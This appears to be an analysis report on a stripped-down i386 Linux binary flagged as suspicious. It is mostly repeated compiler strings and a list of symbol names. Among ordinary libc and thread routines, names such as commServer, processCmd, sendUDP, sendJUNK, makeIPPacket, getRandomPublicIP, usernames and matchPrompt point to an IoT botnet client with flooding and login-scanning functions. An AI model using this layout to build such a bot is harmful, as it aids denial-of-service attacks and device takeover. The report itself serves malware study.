(GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2
Identified
242
Suspicious
True check_circle
Functions
List
, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , libc/sysdeps/linux/i386/crti.S, , crtstuff.c, , __CTOR_LIST__, , __DTOR_LIST__, , __EH_FRAME_BEGIN__, , __JCR_LIST__, , completed.2429, , p.2427, , __do_global_dtors_aux, , object.2482, , frame_dummy, , crtstuff.c, , __CTOR_END__, , __DTOR_END__, , __FRAME_END__, , __JCR_END__, , __do_global_ctors_aux, , initfini.c, , libc/sysdeps/linux/i386/crtn.S, , libc/sysdeps/linux/i386/crt1.S, , client.c, , trigger, , c, , Q, , i.4252, , printchar, , prints, , printi, , print, , fdopen_pids, , hextable, , ipState, , errno.c, , thread_self, , manager.c, , terminated_children, , main_thread_exiting, , pthread_kill_all_threads, , pthread_start_thread, , pthread_start_thread_event, , pthread_free, , restart, , pthread_reap_children, , pthread_threads_counter, , ptfork.c, , pthread_insert_list, , pthread_call_handlers, , pthread_atfork_lock, , pthread_atfork_prepare, , pthread_atfork_child, , pthread_atfork_parent, , semaphore.c, , enqueue, , remove_from_queue, , __pthread_set_own_extricate_if, , thread_self, , new_sem_extricate_func, , suspend, , signals.c, , pthread_null_sighandler, , thread_self, , pthread_sighandler_rt, , sighandler, , pthread_sighandler, , spinlock.c, , wait_node_dequeue, , __pthread_acquire, , wait_node_free, , wait_node_free_list_spinlock, , wait_node_free_list, , restart, , thread_self, , suspend, , wrapsyscall.c, , pthread.c, , current_rtmin, , current_rtmax, , pthread_handle_sigdebug, , current_level, , suspend, , thread_self, , pthread_onexit_process, , pthread_initialize, , pthread_handle_sigrestart, , pthread_handle_sigcancel, , __libc_multiple_threads_ptr, , attr.c, , cancel.c, , thread_self, , condvar.c, , enqueue, , remove_from_queue, , __pthread_set_own_extricate_if, , restart, , thread_self, , cond_extricate_func, , suspend, , events.c, , join.c, , __pthread_set_own_extricate_if, , thread_self, , join_extricate_func, , suspend, , lockfile.c, , mutex.c, , __pthread_trylock, , __pthread_alt_trylock, , once_masterlock, , once_finished, , fork_generation, , thread_self, , pthread_once_cancelhandler, , ptlongjmp.c, , pthread_cleanup_upto, , specific.c, , thread_self, , pthread_keys, , pthread_keys_mutex, , sigaction.c, , __restore_rt, , __restore, , libc/sysdeps/linux/i386/clone.S, , __error, , libc/sysdeps/linux/i386/setjmp.S, , libc/sysdeps/linux/i386/mmap.S, , __syscall_fcntl.c, , __syscall_fcntl64.c, , __syscall_rt_sigaction.c, , _exit.c, , chdir.c, , close.c, , dup2.c, , fork.c, , fsync.c, , getdtablesize.c, , geteuid.c, , getpagesize.c, , getpid.c, , getppid.c, , getrlimit.c, , gettimeofday.c, , kill.c, , llseek.c, , longjmp.c, , lseek.c, , msync.c, , munmap.c, , nanosleep.c, , open.c, , open64.c, , pause.c, , pipe.c, , poll.c, , pread_write.c, , __fake_pread_write64, , __fake_pread_write, , read.c, , sched_get_priority_max.c, , sched_get_priority_min.c, , sched_getparam.c, , sched_getscheduler.c, , sched_setscheduler.c, , sched_yield.c, , select.c, , setrlimit.c, , setsid.c, , sigprocmask.c, , sigsuspend.c, , time.c, , wait.c, , wait4.c, , waitpid.c, , write.c, , isspace.c, , toupper.c, , __C_ctype_b.c, , __C_ctype_toupper.c, , errno.c, , puts.c, , _stdio.c, , _stdio_streams, , __stdio_mutex_initializer.4160, , _fixed_buffers, , _wcommit.c, , fputc_unlocked.c, , fputs_unlocked.c, , fwrite_unlocked.c, , memcpy.c, , memset.c, , strchr.c, , strcpy.c, , strlen.c, , strncpy.c, , strstr.c, , strtok.c, , next_start.1278, , isatty.c, , tcdrain.c, , tcgetattr.c, , ntohl.c, , inet_ntoa.c, , buf.2827, , inet_makeaddr.c, , accept.c, , connect.c, , getsockopt.c, , recv.c, , recvfrom.c, , recvmsg.c, , send.c, , sendmsg.c, , sendto.c, , setsockopt.c, , socket.c, , sigaddset.c, , sigdelset.c, , sigempty.c, , sigfillset.c, , sigismem.c, , sigjmp.c, , signal.c, , sigsetops.c, , malloc.c, , __malloc_largebin_index, , calloc.c, , free.c, , __malloc_trim, , abort.c, , mylock, , been_there_done_that, , rand.c, , random.c, , mylock, , unsafe_state, , randtbl, , random_r.c, , random_poly_info, , system.c, , atol.c, , strtol.c, , _stdlib_strto_l.c, , exit.c, , on_exit.c, , daemon.c, , execl.c, , sleep.c, , sysconf.c, , libc_pthread_init.c, , __uClibc_main.c, , __pthread_return_0, , __pthread_return_void, , __check_one_fd, , been_there_done_that.3001, , rpc_thread.c, , rpc_thread_multi, , __libc_tsd_RPC_VARS_mem, , once.5915, , __syscall_error.c, , libc/sysdeps/linux/i386/__longjmp.S, , libc/sysdeps/linux/i386/vfork.S, , __socketcall.c, , clock_getres.c, , execve.c, , getegid.c, , getgid.c, , getuid.c, , ioctl.c, , sbrk.c, , _WRITE.c, , _fwrite.c, , _trans2w.c, , _uintmaxtostr.c, , memchr.c, , mempcpy.c, , memrchr.c, , strtok_r.c, , strpbrk.c, , clnt_simple.c, , clnt_udp.c, , clntudp_geterr, , clntudp_freeres, , clntudp_abort, , clntudp_control, , udp_ops, , clntudp_destroy, , clntudp_call, , create_xid.c, , mylock, , is_initialized, , __rpc_lrand48_data, , pm_getport.c, , timeout, , tottimeout, , pmap_prot.c, , rpc_commondata.c, , rpc_prot.c, , reply_dscrm, , svc.c, , svc_find, , svc_auth.c, , svcauthsw, , _svcauth_null, , svc_authux.c, , xdr.c, , crud.3487, , xdr_zero, , xdr_mem.c, , xdrmem_ops, , xdrmem_destroy, , xdrmem_getpos, , xdrmem_setpos, , xdrmem_inline, , xdrmem_putint32, , xdrmem_getint32, , xdrmem_putlong, , xdrmem_getlong, , xdrmem_putbytes, , xdrmem_getbytes, , inet_aton.c, , gethostbyname_r.c, , realloc.c, , lrand48_r.c, , nrand48_r.c, , srand48_r.c, , __exit_handler.c, , dl-support.c, , brk.c, , cmsg_nxthdr.c, , mremap.c, , fseeko.c, , printf.c, , fseeko64.c, , _adjust_pos.c, , _cs_funcs.c, , vfprintf.c, , _vfprintf_internal.c, , _charpad, , _fp_out_narrow, , spec_base.4370, , prefix.4371, , _ppfs_init.c, , _ppfs_prepargs.c, , _ppfs_setargs.c, , _ppfs_parsespec.c, , _promoted_size, , type_codes, , type_sizes, , spec_flags.4372, , qual_chars.4377, , spec_chars.4373, , spec_ranges.4374, , spec_or_mask.4375, , spec_and_mask.4376, , fputs.c, , memmove.c, , strcmp.c, , strnlen.c, , memcmp.c, , memcmp_bytes, , rawmemchr.c, , strspn.c, , __glibc_strerror_r.c, , __xpg_strerror_r.c, , unknown.1330, , _string_syserrmsgs.c, , ffs.c, , auth_none.c, , authnone_verf, , authnone_validate, , authnone_refresh, , authnone_destroy, , authnone_marshal, , ops, , authunix_prot.c, , bindresvport.c, , port.2516, , pmap_clnt.c, , __get_myaddress, , timeout, , tottimeout, , rpc_dtablesize.c, , size.4051, , xdr_array.c, , dnslookup.c, , mylock, , static_ns, , static_id, , opennameservers.c, , get_hosts_byname_r.c, , bind.c, , drand48-iter.c, , __h_errno_location.c, , wcrtomb.c, , wcsrtombs.c, , wcsnrtombs.c, , fclose.c, , fopen.c, , perror.c, , fprintf.c, , _fopen.c, , _load_inttype.c, , _store_inttype.c, , _fpmaxtostr.c, , fmt, , exp10_table, , fgets.c, , fflush_unlocked.c, , fgets_unlocked.c, , strncat.c, , strdup.c, , clnt_perror.c, , rpc_errlist, , rpc_errstr, , free_mem, , _buf, , auth_errlist, , auth_errstr, , ntop.c, , inet_pton4, , xdigits.3285, , inet_ntop4, , encodeh.c, , decodeh.c, , encodeq.c, , lengthq.c, , decodea.c, , read_etc_hosts_r.c, , tolower.c, , __C_ctype_tolower.c, , sprintf.c, , vsnprintf.c, , fgetc_unlocked.c, , strcasecmp.c, , encoded.c, , decoded.c, , lengthd.c, , _READ.c, , _rfill.c, , _trans2r.c, , __fini_array_end, , __fini_array_start, , __init_array_end, , __preinit_array_end, , _GLOBAL_OFFSET_TABLE_, , __init_array_start, , __preinit_array_start, , __read_etc_hosts_r, , longjmp, , __libc_tcdrain, , __linuxthreads_pthread_threads_max, , __GI_pthread_attr_getdetachstate, , __GI_execve, , __libc_sigaction, , __libc_pread, , strcpy, , __GI_fcntl64, , recvLine, , __GI_sigaddset, , __socketcall, , __GI___ctype_b, , xdr_longlong_t, , bcmp, , __GI_memchr, , __GI_pthread_attr_setdetachstate, , __GI___glibc_strerror_r, , pthread_mutex_timedlock, , waitpid, , __longjmp, , __libc_fsync, , __open_nameservers, , __GI_fopen, , xprt_register, , getrlimit, , ioctl, , pause, , pthread_cond_signal, , _stdio_openlist_use_count, , __pthread_mutexattr_destroy, , __GI_initstate_r, , __GI_sigaction, , strtok_r, , __GI___C_ctype_toupper_data, , __GI_xdrmem_create, , __GI_time, , getgid, , __pthread_exit_code, , printf, , sysconf, , stdout, , random, , __GI_strdup, , __GI_getpagesize, , lrand48_r, , getdtablesize, , __GI_h_errno, , __length_question, , __GI___ctype_toupper, , __GI_strcasecmp, , __pthread_restart_new, , __GI_tolower, , pthread_mutexattr_gettype, , putc_unlocked, , pthread_attr_destroy, , recv, , connect, , __linuxthreads_initial_report_events, , __encode_question, , svcerr_auth, , __GI___uClibc_fini, , numpids, , __encode_header, , pthread_attr_getstacksize, , __GI_strncat, , __pthread_once, , pthread_create, , sigemptyset, , __pthread_mutex_lock, , pthread_getspecific, , __new_sem_destroy, , initConnection, , __sigdelset, , __GI_clock_getres, , __GI_pthread_attr_init, , __GI_svc_register, , __pthread_find_self, , __uClibc_fini, , memrchr, , geteuid, , __rpc_thread_svc_cleanup, , inet_pton, , __GI_vsnprintf, , pthread_attr_init, , __GI_pthread_setcanceltype, , __GI_setsid, , pthread_mutexattr_getkind_np, , __GI_sigsuspend, , memmove, , sendTCP, , pthread_exit, , __bsd_signal, , sem_timedwait, , __GI_strpbrk, , pmap_set, , __stdio_trans2r_o, , __GI_setsockopt, , munmap, , __libc_stack_end, , __pthread_manager_thread_bos, , sched_getparam, , __GI_fclose, , __GI_wcsnrtombs, , __GI_pipe, , _uintmaxtostr, , _longjmp, , __exit_function_table, , __GI_xdr_pmap, , pthread_condattr_setpshared, , xdrmem_create, , __libc_fcntl, , atol, , _h_errno, , xdr_des_block, , __new_sem_init, , getRandomPublicIP, , xdr_opaque_auth, , getc_unlocked, , clnt_spcreateerror, , __ctype_b, , __pthread_manager_event, , __GI_random_r, , __fresetlockfiles, , usernames, , clnt_perrno, , pwrite64, , __GI___longjmp, , __pthread_mutexattr_settype, , errno, , getegid, , __GI_pthread_attr_getschedparam, , __linuxthreads_create_event, , __GI_clnt_sperror, , __GI_sbrk, , zprintf, , __libc_accept, , __GI___uClibc_init, , _create_xid, , __exit_handler, , execve, , __libc_current_sigrtmax, , __GI_pthread_condattr_destroy, , __libc_pwrite64, , pthread_condattr_init, , getpagesize, , getpid, , pthread_attr_getstackaddr, , xdr_u_hyper, , __pthread_suspend, , setstate_r, , __GI_lseek64, , fgets, , getHost, , __libc_getpid, , wildString, , pthread_key_delete, , __GI_pthread_attr_setschedparam, , __xpg_strerror_r, , __GI___rpc_thread_svc_fdset, , _pthread_cleanup_pop, , fcntl64, , __pthread_lock, , memcpy, , __GI_svc_getreq, , pthread_cancel, , makeRandomStr, , pmap_getport, , getRandomIP, , __GI_fputs_unlocked, , execl, , __pthread_mutexattr_setpshared, , __GI_fgets, , __pthread_initial_thread_bos, , svc_sendreply, , perror, , pthread_mutexattr_destroy, , _rpc_dtablesize, , __pthread_reset_main_thread, , creat, , _stdio_openlist_dec_use, , sclose, , __libc_select, , __pthread_do_exit, , pthread_equal, , _ppfs_init, , __GI_memcmp, , puts, , __GI___C_ctype_toupper, , __GI_fgetc_unlocked, , __libc_nanosleep, , trim, , __GI_fgets_unlocked, , dup2, , __pthread_mutex_init, , __libc_current_sigrtmin, , __pthread_sig_debug, , sem_destroy, , __GI__seterr_reply, , tolower, , getuid, , __GI_xdr_string, , system, , __open_etc_hosts, , __rpc_thread_svc_max_pollfd, , __GI_xprt_register, , __pthread_cleanup_push_defer, , malloc, , isatty, , __GI_pthread_cond_timedwait, , siglongjmp, , pthread_attr_getscope, , __GI_pmap_unset, , sleep, , __GI_atol, , sched_setscheduler, , __new_sem_post, , __pthread_initialize_manager, , vsnprintf, , __dns_lookup, , __GI_read, , recvfrom, , sem_wait, , xdr_bytes, , svcerr_decode, , tcdrain, , __C_ctype_tolower, , pthread_attr_getguardsize, , random_r, , __libc_longjmp, , __dso_handle, , sem_post, , sched_getscheduler, , __new_exitfn, , clock_getres, , pthread_testcancel, , __pthread_manager_sighandler, , __libc_pthread_init, , gethostbyname_r, , __pthread_attr_getstackaddr, , tcpcsum, , __linuxthreads_death_event, , __linuxthreads_version, , fdpclose, , __GI_pthread_attr_destroy, , socket, , __GI_dup2, , select, , _pthread_cleanup_pop_restore, , __GI_wcrtomb, , __GI___libc_fcntl, , __GI_memset, , __GI_accept, , clnt_perror, , __pthread_attr_setstacksize, , isspace, , pthread_attr_getinheritsched, , __stdio_seek, , __linuxthreads_pthread_keys_max, , pthread_kill_other_threads_np, , mempcpy, , __GI_strcoll, , __GI_write, , __pthread_mutexattr_gettype, , xdr_void, , sem_unlink, , __ctype_toupper, , __libc_pwrite, , __libc_read, , xdr_pmap, , svcerr_progvers, , __GI_xdr_accepted_reply, , _string_syserrmsgs, , svcerr_noproc, , __pthread_kill_other_threads_np, , __GI_open, , __GI_strchr, , __searchdomain, , __pthread_initialize, , __GI_xdr_rejected_reply, , __pthread_mutexattr_setkind_np, , lseek, , __GI_clnt_perror, , sigaddset, , __linuxthreads_pthread_key_2ndlevel_size, , __GI_tcgetattr, , __environ, , mmap, , xdr_vector, , __GI_clntudp_create, , __pthread_alt_unlock, , svc_getreq_common, , wcsnrtombs, , pthread_detach, , makeIPPacket, , sockprintf, , __GI_inet_ntoa, , send, , svc_getreq, , __fgetc_unlocked, , __GI_clnt_spcreateerror, , abort, , nrand48_r, , xprt_unregister, , pthread_attr_getschedpolicy, , __sigjmp_save, , __libc_drand48_data, , __pthread_handles, , __GI_fcntl, , __GI_wcsrtombs, , __GI_fwrite_unlocked, , __libc_tsd_RPC_VARS_data, , __GI_getgid, , srandom_r, , __GI_fputs, , xdr_char, , _init, , __GI_setrlimit, , clnt_pcreateerror, , __GI_inet_ntoa_r, , __GI_setstate_r, , pthread_attr_setstackaddr, , parseHex, , strtol, , __sigsetjmp, , pipe, , __libc_lseek64, , __GI_pthread_getschedparam, , _svcauth_unix, , strnlen, , rawmemchr, , __GI_mempcpy, , accept, , __libc_allocate_rtsig, , __malloc_state, , pthread_getschedparam, , __GI___C_ctype_b_data, , __libc_pread64, , __GI_xdr_replymsg, , __GI_lrand48_r, , __sigaddset, , __GI_xdr_authunix_parms, , pthread_setcancelstate, , xdr_union, , __pthread_functions, , nanosleep, , __GI_send, , __pthread_wait_for_restart_signal, , xdr_enum, , h_errno, , calloc, , __GI_svcerr_auth, , xdr_bool, , __pthread_mutex_unlock, , wait4, , __register_frame_info_bases, , __GI_exit, , __app_fini, , setrlimit, , csum, , __GI_xdr_long, , __exit_cleanup, , xdr_wrapstring, , xdr_rejected_reply, , __GI___rpc_thread_createerr, , __GI_execl, , __GI_srandom_r, , pthread_condattr_destroy, , __GI___ctype_tolower, , pthread_attr_setscope, , write, , __rpc_thread_variables, , environ, , __GI_close, , xdr_free, , xdr_netobj, , fprintf, , __resolv_lock, , kill, , fputs_unlocked, , __pthread_mutex_trylock, , __pthread_destroy_specifics, , ffs, , svc_register, , xdr_long, , pthread_mutexattr_setkind_np, , __GI_svcerr_decode, , __GI_brk, , bind, , _svcauth_short, , __GI_nanosleep, , __GI_strtok, , svcerr_systemerr, , _stdio_openlist, , __GI_sigprocmask, , inet_addr, , ntohl, , __GI_fseek, , __pthread_nonstandard_stacks, , __GI_clntudp_bufcreate, , __GI___libc_open64, , pthread_cond_broadcast, , pthread_once, , __pthread_once_fork_child, , ourIP, , chdir, , pthread_attr_setinheritsched, , __pthread_alt_lock, , pmap_unset, , __pthread_manager_adjust_prio, , fseeko, , _stdio_openlist_del_count, , connectTimeout, , __pthread_manager_thread, , __pthread_setconcurrency, , setsockopt, , xdr_short, , bsd_signal, , fseek, , mremap, , pthread_setschedparam, , __GI_kill, , __GI_strcmp, , svc_getreqset, , __GI_memmove, , setstate, , __decode_dotted, , __GI_pthread_cond_broadcast, , __pthread_perform_cleanup, , __stdio_READ, , pthread_key_create, , memchr, , __GI_toupper, , __pthread_initialize_minimal, , __GI_recv, , svc_getreq_poll, , __stdin, , stdin, , __GI_clnt_sperrno, , __new_sem_wait, , wait, , xdr_accepted_reply, , __GI_isatty, , __libc_open64, , pthread_setconcurrency, , sem_init, , svcerr_weakauth, , xdr_authunix_parms, , __pthread_mutex_destroy, , __pthread_mutexattr_getkind_np, , __pthread_handles_num, , _start, , sem_close, , __deregister_frame_info_bases, , __GI_xdr_opaque_auth, , strstr, , __GI_ioctl, , xdr_u_longlong_t, , init_rand, , rand, , pthread_kill, , signal, , read, , __GI_xdr_int, , __pthread_manager_request, , __pthread_internal_tsd_get, , __decode_header, , pread64, , __linuxthreads_pthread_sizeof_descr, , pthread_attr_setstacksize, , getCores, , __GI___h_errno_location, , xdr_u_char, , __GI_memcpy, , sendmsg, , strcoll, , clntudp_create, , __GI_xdr_callhdr, , wcsrtombs, , _stdio_user_locking, , __pthread_internal_tsd_address, , __cmsg_nxthdr, , __GI_svcerr_noprog, , __GI_sigdelset, , strncpy, , strcasecmp, , htonl, , sendto, , __exit_count, , xdr_u_long, , __C_ctype_toupper, , __GI_open64, , StartTheLelz, , sched_get_priority_max, , __GI___C_ctype_b, , xdr_replymsg, , pthread_sigmask, , realloc, , on_exit, , __libc_siglongjmp, , __GI_gethostbyname_r, , __GI_pthread_cond_signal, , __GI_strncpy, , __libc_send, , __GI___xpg_strerror_r, , currentServer, , __pthread_attr_setstackaddr, , __GI___C_ctype_tolower, , __GI_recvfrom, , pthread_cond_init, , __GI_getrlimit, , __GI_strcpy, , __GI_inet_ntop, , strtok, , __GI___fputc_unlocked, , sigfillset, , memcmp, , svcerr_noprog, , sched_get_priority_min, , __stdio_adjust_position, , xdr_opaque, , malloc_trim, , _vfprintf_internal, , __GI_poll, , __GI_nrand48_r, , fork, , __pthread_restart, , __GI_pthread_attr_setschedpolicy, , pthread_mutexattr_getpshared, , __GI_pthread_attr_setinheritsched, , __stdio_rfill, , strncat, , __GI_pthread_attr_getscope, , __GI_bindresvport, , gotIP, , __libc_pause, , sem_trywait, , __GI_sleep, , sigaction, , _dl_phdr, , __pthread_mutexattr_init, , __GI_svc_sendreply, , __GI_getc_unlocked, , __GI___libc_fcntl64, , __uClibc_init, , xdr_callhdr, , __GI_munmap, , _store_inttype, , __length_dotted, , __getpagesize, , __GI_random, , __GI_mremap, , __syscall_error, , __uclibc_progname, , __GI_getegid, , __GI_wait4, , __malloc_lock, , __uClibc_main, , sbrk, , __rtld_fini, , __GI_svcerr_progvers, , __GI_fork, , strdup, , __libc_close, , __pthread_internal_tsd_set, , __GI_getpid, , inet_aton, , pthread_condattr_getpshared, , index, , _pthread_cleanup_push_defer, , processCmd, , __sigismember, , gettimeofday, , fopen, , __bss_start, , __GI_pthread_self, , __libc_open, , memset, , __GI_socket, , main, , __GI___libc_lseek, , __glibc_strerror_r, , __GI_sigfillset, , __rpc_thread_clnt_cleanup, , listFork, , __GI___C_ctype_tolower_data, , __GI_xdr_union, , __stdio_fwrite, , negotiate, , srand, , __rpc_thread_svc_pollfd, , initstate, , fclose, , __GI_pthread_attr_setscope, , __syscall_rt_sigaction, , open64, , xdr_string, , ntohs, , pthread_mutexattr_settype, , inet_ntoa, , sendUDP, , getppid, , tcgetattr, , __C_ctype_tolower_data, , __libc_recvfrom, , time, , __pthread_threads_events, , __libc_system, , __GI_abort, , pthread_mutexattr_setpshared, , poll, , __GI_pthread_cond_wait, , __GI_pthread_cond_init, , __GI_pthread_cond_destroy, , __GI_xdr_u_short, , xdr_u_int, , fdpopen, , __GI_fprintf, , pthread_attr_getdetachstate, , __pthread_last_event, , __get_hosts_byname_r, , __stdio_init_mutex, , __GI__exit, , __libc_recvmsg, , strcmp, , pthread_mutex_unlock, , callrpc, , __nameserver, , data_start, , _seterr_reply, , __rpc_thread_svc_fdset, , __GI_sysconf, , __pthread_manager_reader, , __pthread_initial_thread, , __h_errno_location, , __GI_putc_unlocked, , __GI___rpc_thread_svc_pollfd, , matchPrompt, , __C_ctype_b_data, , __GI_inet_pton, , _stdio_fopen, , __GI_xdr_u_hyper, , __GI_pthread_setschedparam, , _fini, , __GI_xdr_opaque, , __GI_chdir, , authnone_create, , __vfork, , __GI_mmap, , __GI_xdr_array, , sprintf, , __pthread_offsetof_descr, , __new_sem_trywait, , fdgets, , msync, , __get_pc_thunk_bx, , strerror_r, , __GI_ffs, , __GI_select, , __libc_waitpid, , __pthread_unlock, , __libc_multiple_threads, , sem_open, , __GI_xdr_bool, , __rpc_thread_destroy, , __GI_waitpid, , __GI_xdr_u_int, , __GI_vfprintf, , __GI_xdr_enum, , _stdio_term, , __decode_answer, , __GI_signal, , __pthread_attr_setguardsize, , stderr, , __pthread_exit_requested, , commServer, , __pthread_attr_getguardsize, , __pthread_manager_thread_tos, , __GI_pthread_exit, , vfork, , __C_ctype_b, , __pthread_once_fork_parent, , srandom, , _ppfs_setargs, , __GI_sendto, , __GI_sigemptyset, , __GI_printf, , __libc_fork, , sigismember, , __atexit_lock, , scanPid, , __linuxthreads_reap_event, , fsync, , rand_cmwc, , __pthread_manager, , __libc_lseek, , __GI_xprt_unregister, , clnt_sperror, , __GI_pmap_set, , __pthread_getconcurrency, , __pthread_alt_timedlock, , __libc_fcntl64, , _pthread_cleanup_push, , pread, , pthread_self, , pthread_setcanceltype, , getsockopt, , __GI_fseeko64, , __pthread_once_fork_prepare, , pthread_mutexattr_init, , __libc_wait, , fflush_unlocked, , __stdio_wcommit, , __exit_slots, , __GI___fgetc_unlocked, , __nameservers, , fwrite_unlocked, , inet_ntoa_r, , __pagesize, , _stdio_openlist_add_lock, , __GI_getdtablesize, , __GI_recvmsg, , __GI_pthread_attr_getschedpolicy, , __drand48_iterate, , _edata, , __stdout, , __GI_memrchr, , __GI_fflush_unlocked, , __GI_xdr_u_long, , __GI_strstr, , __searchdomains, , _end, , bindresvport, , __pthread_threads_max, , htons, , pthread_mutex_destroy, , svc_fdset, , __rpc_thread_createerr, , _sigintr, , _ppfs_prepargs, , __GI_strspn, , fgetc_unlocked, , initstate_r, , pthread_mutex_lock, , __GI_svc_getreq_common, , __new_sem_getvalue, , __GI_connect, , __curbrk, , sem_getvalue, , __libc_poll, , pthread_cond_wait, , _dl_phnum, , __GI_pthread_equal, , _fpmaxtostr, , svc_unregister, , __errno_location, , __pthread_timedsuspend, , uppercase, , __GI_pmap_getport, , _stdlib_strto_l, , __GI___libc_open, , exit, , __stdio_WRITE, , _stdio_init, , pthread_attr_setguardsize, , __GI_geteuid, , __GI_sendmsg, , sigdelset, , inet_ntop, , brk, , pthread_mutex_trylock, , __GI_pthread_setcancelstate, , _null_auth, , pthread_atfork, , __C_ctype_toupper_data, , _dl_aux_init, , sendJUNK, , __GI_perror, , __libc_sendmsg, , _errno, , _authenticate, , __GI_gettimeofday, , atoi, , _stdio_openlist_del_lock, , pthread_cond_destroy, , __GI_inet_aton, , pthread_attr_setschedpolicy, , __GI_svc_getreq_poll, , fgets_unlocked, , __pthread_mutexattr_getpshared, , __GI_bind, , _exit, , szprintf, , __pthread_timedsuspend_new, , __pthread_sig_cancel, , __GI_xdr_void, , __GI_lseek, , __pthread_sig_restart, , strspn, , __pthread_offsetof_pid, , __libc_recv, , __pthread_main_thread, , daemon, , pthread_mutex_init, , __pthread_cleanup_pop_restore, , __libc_creat, , __pthread_attr_getstacksize, , strlen, , __GI___cmsg_nxthdr, , lseek64, , open, , clone, , xdr_array, , toupper, , __libc_write, , __malloc_consolidate, , _ppfs_parsespec, , __GI_strtol, , __GI_getuid, , __GI_strtok_r, , __GI_errno, , __fork, , __libc_sendto, , __stdio_trans2w_o, , __GI_vfork, , __GI__authenticate, , strchr, , __GI_rawmemchr, , __GI_srand48_r, , fputs, , svc_max_pollfd, , __GI_raise, , pthread_attr_setschedparam, , __data_start, , __pthread_sizeof_handle, , __pthread_provide_wrappers, , setsid, , __GI_inet_addr, , __GI_svc_unregister, , __GI_pthread_condattr_init, , rpc_createerr, , __libc_msync, , __encode_dotted, , __GI_strnlen, , _Jv_RegisterClasses, , macAddress, , __pthread_threads_debug, , pthread_attr_setdetachstate, , recvmsg, , fputc_unlocked, , svc_pollfd, , readUntil, , __libc_sigsuspend, , __GI_xdr_hyper, , fcntl, , __GI_xdr_bytes, , 